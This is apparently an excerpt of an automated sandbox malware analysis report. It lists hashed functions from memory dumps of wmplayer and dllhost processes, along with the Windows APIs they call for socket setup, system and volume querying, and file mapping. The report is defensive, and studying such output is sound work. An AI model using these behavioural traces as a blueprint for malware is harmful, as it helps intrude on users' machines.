                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 30ecec59194c9ffcf8559e8d96a910a5d7be0e2ce43a3a65ef5f18c5e22ade94
                                                                                                                                                                                                                                                                                                          • Instruction ID: 5f2c31823e8633d6c36cfdcb6bbb878900fb44806ffa2a3e6defde8b06c700c4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30ecec59194c9ffcf8559e8d96a910a5d7be0e2ce43a3a65ef5f18c5e22ade94
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B318170616A048FDBD0DF28C5C876237E6EFA8369F506199E806CB38ED770D884DB81
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FEDBCC Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 542ed1d49eb6963af29ee6fe29f9a03794f187a1c862330fe1215d2d8235d0f4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fbeb56ece995088b76dd5c21d54cad8e0ac5a6ba9f78397ae3b26e7a6714c4d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C31180302099598FFF76AF6D88887A532E4FB78369F14017BE80DCA195CB709C94C792
                                                                                                                                                                                                                                                                                                          Function 00007DF4F821063C Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2694286045.00007DF4F8201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F8201000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f8201000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4133e08214f52128653c88f415440736682cfce25d501ffcbf25ad9c4b151995
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 824716752341d80b75d8ee6151b82c4d32d575334c5b2856fbabe19722d7ec18
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC118430A44D598FFFA5DFA9849476632E0EF98311F15027BE80ECE199CB38AC40C791
                                                                                                                                                                                                                                                                                                          Function 0000021AB2FDA9D4 Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                                                                                                                                                                          • Instruction ID: 916e75afabdd0c865f286684d1e409ab2005df662934ff18f778e03481a12e0b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86F01D70216E4B8FEB85EF29C4D87A073E4FB7834AF64016A9409C25A0D7759D65C706
                                                                                                                                                                                                                                                                                                          Function 0000021AB3014C3C Relevance: 1.3, APIs: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2690885056.0000021AB2FD1000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000021AB2FD1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_21ab2fd1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: free
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2e710876b5b3087c0a7c6f9bccb089c58fd82b13e9e3ed8a9cb72cb9013f3709
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CF09070215D0A4FEFD4EB6984D8F6633E4FF78368F601254A90AC61B5DB22CC82C741

                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                          Function 00007DF4F81A199C Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000023.00000002.2693452463.00007DF4F81A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4F81A1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_35_2_7df4f81a1000_wmplayer.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationProcessQuery
                                                                                                                                                                                                                                                                                                          • String ID: ($.$o
                                                                                                                                                                                                                                                                                                          • API String ID: 1778838933-116743476
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 75b4de70949fda877a20c61ae92b35d789d351051bec86184ddb663cf619d5fe
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bc1349027c11bed1782b00e19f7c38053766996ee3beef85e27a3dd3919dec8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C181693094C7D44EF3A59B6885183EBBBE5EF56300F145B2ED0DF87292D6289545C713

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:2.6%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                          Signature Coverage:2.9%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:140
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                                                                                                          execution_graph 13808 1f269c730d8 13811 1f269c7310b 13808->13811 13809 1f269c73118 13813 1f269c7311d 13809->13813 13814 1f269c746c4 13809->13814 13811->13809 13818 1f269c72b70 13811->13818 13817 1f269c746d6 13814->13817 13816 1f269c746ef 13816->13813 13817->13816 13822 1f269c74634 13817->13822 13821 1f269c72b86 13818->13821 13819 1f269c73dc4 free 13820 1f269c72ef1 13819->13820 13820->13809 13821->13819 13823 1f269c7464f 13822->13823 13824 1f269c7466c 13823->13824 13830 1f269c78110 13823->13830 13825 1f269c73dc4 free 13824->13825 13829 1f269c746a4 13825->13829 13827 1f269c74660 13834 1f269c73dc4 13827->13834 13829->13816 13831 1f269c78119 13830->13831 13832 1f269c781dc 13830->13832 13831->13832 13833 1f269c781d2 free 13831->13833 13832->13827 13833->13832 13835 1f269c73dd7 13834->13835 13836 1f269c73df3 13834->13836 13835->13836 13837 1f269c73dea free 13835->13837 13836->13824 13837->13836 13838 1f269c96f3c SetErrorMode 13839 1f269c96f50 13838->13839 13840 1f269c9a516 socket 13839->13840 13841 1f269c9a55a getsockopt 13840->13841 13842 1f269c9a5a3 socket 13840->13842 13841->13842 13844 1f269c9a5c3 13842->13844 13845 1f269c72874 13846 1f269c7288e 13845->13846 13847 1f269c72898 13846->13847 13848 1f269c72893 LoadLibraryA 13846->13848 13848->13847 13973 1f269c75454 13974 1f269c754c9 13973->13974 13976 1f269c7546a 13973->13976 13975 1f269c753d4 2 API calls 13974->13975 13974->13976 13975->13976 13961 1f269c72ad2 13962 1f269c72ae7 13961->13962 13963 1f269c746c4 2 API calls 13962->13963 13964 1f269c72b07 13962->13964 13963->13964 13886 1f269c728a0 13887 1f269c728bc 13886->13887 13888 1f269c728c1 GetProcAddressForCaller 13887->13888 13889 1f269c728ca 13887->13889 13888->13889 13902 1f269c75540 13903 1f269c7555e 13902->13903 13905 1f269c7558a 13903->13905 13906 1f269c753d4 13903->13906 13907 1f269c753d9 13906->13907 13908 1f269c75416 13906->13908 13907->13908 13909 1f269c746c4 2 API calls 13907->13909 13908->13905 13909->13908 13910 1f269c99554 13911 1f269c99578 13910->13911 13912 1f269c9955e 13910->13912 13912->13911 13914 1f269c97fe0 13912->13914 13915 1f269c97ef0 3 API calls 13914->13915 13916 1f269c98011 13915->13916 13916->13911 13977 1f269c757c8 13978 1f269c757e5 13977->13978 13979 1f269c75871 13978->13979 13980 1f269c753d4 2 API calls 13978->13980 13980->13979 13849 1f269c97ef0 13850 1f269c97f14 socket 13849->13850 13852 1f269c97f2c 13849->13852 13851 1f269c97f47 13850->13851 13850->13852 13851->13852 13854 1f269c97b00 13851->13854 13855 1f269c97b32 13854->13855 13856 1f269c97b55 CreateIoCompletionPort 13855->13856 13858 1f269c97b3d 13855->13858 13857 1f269c97b6d 13856->13857 13857->13858 13859 1f269c97ba2 SetFileCompletionNotificationModes 13857->13859 13858->13852 13859->13858 13860 1f269c72690 13863 1f269c728d4 13860->13863 13864 1f269c726a2 13863->13864 13865 1f269c728dd 13863->13865 13865->13864 13866 1f269c72944 SetErrorMode 13865->13866 13867 1f269c72955 13866->13867 13869 1f269c73970 13867->13869 13870 1f269c73991 13869->13870 13876 1f269c73ae9 13870->13876 13877 1f269c73544 13870->13877 13873 1f269c739c2 13873->13876 13881 1f269c7376c 13873->13881 13874 1f269c73a5e 13875 1f269c73ad3 NtQuerySystemInformation 13874->13875 13874->13876 13875->13876 13876->13864 13878 1f269c7356d 13877->13878 13879 1f269c73637 GetVolumeInformationW 13878->13879 13880 1f269c73672 13878->13880 13879->13880 13880->13873 13882 1f269c7379e 13881->13882 13883 1f269c7387e CreateFileMappingW 13882->13883 13884 1f269c738b8 MapViewOfFile 13883->13884 13885 1f269c738db 13883->13885 13884->13885 13885->13874 13890 1f269c995a4 13891 1f269c995b3 13890->13891 13893 1f269c995d6 13890->13893 13891->13893 13894 1f269c98024 13891->13894 13897 1f269c97ef0 13894->13897 13896 1f269c9806d 13896->13893 13898 1f269c97f14 socket 13897->13898 13900 1f269c97f2c 13897->13900 13899 1f269c97f47 13898->13899 13898->13900 13899->13900 13901 1f269c97b00 2 API calls 13899->13901 13900->13896 13901->13900 13917 1f269c7330c 13918 1f269c7331e 13917->13918 13919 1f269c73378 13917->13919 13918->13919 13921 1f269c75774 13918->13921 13922 1f269c75779 13921->13922 13924 1f269c7579b 13921->13924 13922->13924 13925 1f269c755e0 13922->13925 13924->13918 13926 1f269c7560c 13925->13926 13930 1f269c756b1 13926->13930 13931 1f269c74918 13926->13931 13928 1f269c75697 13929 1f269c753d4 2 API calls 13928->13929 13928->13930 13929->13930 13930->13924 13933 1f269c7493e 13931->13933 13932 1f269c74946 13932->13928 13933->13932 13934 1f269c746c4 2 API calls 13933->13934 13934->13932 13939 1f269c72f2c 13941 1f269c72f46 13939->13941 13942 1f269c73043 13939->13942 13940 1f269c746c4 2 API calls 13945 1f269c73041 13940->13945 13941->13942 13943 1f269c72fc9 13941->13943 13941->13945 13942->13940 13943->13945 13946 1f269c75ce8 13943->13946 13950 1f269c75d04 13946->13950 13953 1f269c75d86 13946->13953 13947 1f269c75d81 13947->13945 13948 1f269c75d79 13949 1f269c746c4 2 API calls 13948->13949 13949->13947 13950->13948 13951 1f269c753d4 2 API calls 13950->13951 13951->13950 13953->13947 13954 1f269c7587c 13953->13954 13955 1f269c758c3 13954->13955 13960 1f269c7594e 13954->13960 13956 1f269c75b2c 13955->13956 13957 1f269c758cc 13955->13957 13958 1f269c755e0 2 API calls 13956->13958 13956->13960 13959 1f269c753d4 2 API calls 13957->13959 13957->13960 13958->13960 13959->13960 13960->13953

                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                          Function 000001F269C73970 Relevance: 1.8, APIs: 1, Instructions: 269nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Information$QuerySystemVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2187445334-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 6b3a7ccf1a84848f62ff83896346a3ed7ba4f21d04a9b3def3ee624f6b9eeaff
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e92f52f04fafdb8c987bb29090aa65ae1428b1b1263f5fb89cc43cd6609f3fd8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17919F31218E094FE7A5EB24D8597FA73F1FB68311F100A3AE85BC71A1EE35D5418B81
                                                                                                                                                                                                                                                                                                          Function 000001F269C72B70 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 272 1f269c72b70-1f269c72c61 call 1f269c73c58 call 1f269c71030 call 1f269c71914 call 1f269c71488 call 1f269c716a0 call 1f269c71488 call 1f269c711dc call 1f269c71488 call 1f269c711dc call 1f269c71488 call 1f269c711dc 296 1f269c72c67-1f269c72c6f call 1f269ca2856 272->296 297 1f269c72e66-1f269c72e81 call 1f269c71488 call 1f269c717dc 272->297 301 1f269c72c74-1f269c72c79 296->301 305 1f269c72e86-1f269c72ea2 297->305 303 1f269c72c80-1f269c72c9c 301->303 304 1f269c72c7b-1f269c72c7e 301->304 306 1f269c72cad-1f269c72caf 303->306 317 1f269c72c9e-1f269c72cab call 1f269ca2856 303->317 304->303 304->306 314 1f269c72ee7-1f269c72efc call 1f269c73dc4 305->314 315 1f269c72ea4-1f269c72ee4 call 1f269c74b34 call 1f269c75ee6 305->315 308 1f269c72cc5-1f269c72cc8 306->308 309 1f269c72cb1-1f269c72cb4 306->309 308->297 312 1f269c72cce-1f269c72cd1 308->312 309->297 311 1f269c72cba-1f269c72cc3 309->311 311->308 316 1f269c72cd3-1f269c72cda 312->316 315->314 321 1f269c72cde-1f269c72ce4 316->321 322 1f269c72cdc 316->322 317->306 321->316 323 1f269c72ce6-1f269c72d07 call 1f269c71488 call 1f269c717dc 321->323 322->321 334 1f269c72d09-1f269c72d10 323->334 335 1f269c72d16-1f269c72e4a call 1f269c71914 call 1f269c71488 call 1f269c75eec call 1f269c71488 * 2 call 1f269c75eec call 1f269c71488 * 2 call 1f269c75eec call 1f269c71488 * 2 call 1f269c75eec call 1f269c71488 * 2 call 1f269c716a0 call 1f269c71488 call 1f269c75eec call 1f269c71488 334->335 336 1f269c72e4f-1f269c72e55 334->336 335->336 336->334 338 1f269c72e5b-1f269c72e64 336->338 338->305
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 77fd5a4bbab4cc85a686b71583c3746bb737b9934f72eb7050730acdf8cf3daf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 08a355c566621220cf1199c51620232cf12c2660aca097f2e3aa5f504b216823
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77fd5a4bbab4cc85a686b71583c3746bb737b9934f72eb7050730acdf8cf3daf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6B13631319A094BE746EB28C4A1AEB73F1FB9C354F004629E88BCB196DE35E505CB91
                                                                                                                                                                                                                                                                                                          Function 000001F269C96F3C Relevance: 6.1, APIs: 4, Instructions: 130networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket$ErrorModegetsockopt
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 552242919-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                                                                                                                                                                                                          • Instruction ID: 91f4f8932220efc395309eae06bd7a5f6f9d8d69fcf20e01fb6fd6919fb068fe
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5311ec3011ded2eede0a7d2498efd547664f48dd7a92f4cf7cf32dea49d33346
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A415170618B498FE748EF28D899AEA77F1FB99310F50862DE487C32A1DF399504CB51
                                                                                                                                                                                                                                                                                                          Function 000001F269C7376C Relevance: 3.2, APIs: 2, Instructions: 176fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3452162329-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b27adf3c145ce8996aa4dcbea5fb1dcecf34d5f997913cd8e6e8376d7df9cea
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 129d2077c0dcf1c5c8194996cfac5c2ad39c6d887897e6f38c829ad1dd2edd25
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD515F3161CB898BD725EB6488967FAB7F0FB99311F00452FE8DBC2191DE3495058B92
                                                                                                                                                                                                                                                                                                          Function 000001F269C97B00 Relevance: 3.1, APIs: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Completion$CreateFileModesNotificationPort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3755109111-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0c68ab508b5cd1224362707b5eade2dda16dd4075a58e0b3546fe9670c6cd486
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a7c7af7fbac319b5ac74e973487f80961a512197179ac17f28a09199c0ed714
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79319C3030691A4FFBA89B28A8947F932E5FB5C325F5011B9EC0BC21D2DF35CD41A696
                                                                                                                                                                                                                                                                                                          Function 000001F269C73544 Relevance: 1.7, APIs: 1, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationVolume
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2039140958-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                                                                                                                                                                                                          • Instruction ID: c1ef00e06c8d0f1cdf243a97787a41d64e88bbd409bbc49a264491ca82d45b22
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71a7f780ae9fe7526399642dc629586b1db88638b38b934ddd42604476fc42bb
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D513E7121C7858BD76AEF24C4956EBB7F1FB98311F400A3EE4CBC22A1DE7495058B42
                                                                                                                                                                                                                                                                                                          Function 000001F269C97EF0 Relevance: 1.6, APIs: 1, Instructions: 93networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: socket
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 447b7a408af3f987d6011d6f51ca6bdc25f1dc750359ee3063f4803dadd2e1cc
                                                                                                                                                                                                                                                                                                          • Instruction ID: c908e983e7d0f752c0cad4b8d44e20ac40be3d6fd466067d1c7cd51512bb2f0b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 447b7a408af3f987d6011d6f51ca6bdc25f1dc750359ee3063f4803dadd2e1cc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D621AE303155098FEB58AB78988D7F933E1EB99335F204679EC2BD62D2EF348C419691
                                                                                                                                                                                                                                                                                                          Function 000001F269C728D4 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 33ec6ddaf9085df90f8e5865b7bf906381379c38ccf4d9984dbe8e39deaa4d69
                                                                                                                                                                                                                                                                                                          • Instruction ID: 53ff1f6f023ef652e997e278793db1c9e696a5abcf5ab0def0c5b9cd43236df8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33ec6ddaf9085df90f8e5865b7bf906381379c38ccf4d9984dbe8e39deaa4d69
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D012130316A0A0BEE99B37889757FD72E6EB9D321F480179EC07DA1D2DE36C9068741
                                                                                                                                                                                                                                                                                                          Function 000001F269C728A0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000024.00000002.2690303125.000001F269C70000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F269C70000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_36_2_1f269c70000_dllhost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressCallerProc
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2663294120-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: be8164fcd6bb8b439b0c6dd95cb79210c8cf986f476e4ea7066077b0df3d1665
